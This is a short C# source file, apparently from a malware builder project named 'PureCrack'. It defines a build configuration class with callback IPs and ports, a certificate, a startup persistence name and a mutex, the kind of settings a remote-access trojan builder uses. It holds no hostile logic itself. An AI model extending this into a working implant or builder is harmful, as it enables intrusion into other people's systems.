27 lines
596 B
C#
27 lines
596 B
C#
using System.Collections.Generic;
|
|||
|
|
|
||
|
|
namespace PureCrack.Build;
|
||
|
|
|
||
|
|
public sealed class BuildConfig
|
||
|
|
{
|
||
|
|
public List<string> Ips { get; init; } = new List<string> { "127.0.0.1" };
|
||
|
|
|
||
|
|
public List<int> Ports { get; init; } = new List<int> { 56001 };
|
||
|
|
|
||
|
|
public string CertPfxBase64 { get; init; } = "";
|
||
|
|
|
||
|
|
public string Group { get; init; } = "Default";
|
||
|
|
|
||
|
|
public bool B0 { get; init; }
|
||
|
|
|
||
|
|
public bool B1 { get; init; }
|
||
|
|
|
||
|
|
public string StartupName { get; init; } = "";
|
||
|
|
|
||
|
|
public string StartupEnv { get; init; } = "";
|
||
|
|
|
||
|
|
public string Mutex { get; init; } = "purecrack-default";
|
||
|
|
|
||
|
|
public bool B2 { get; init; }
|
||
|
|
}
|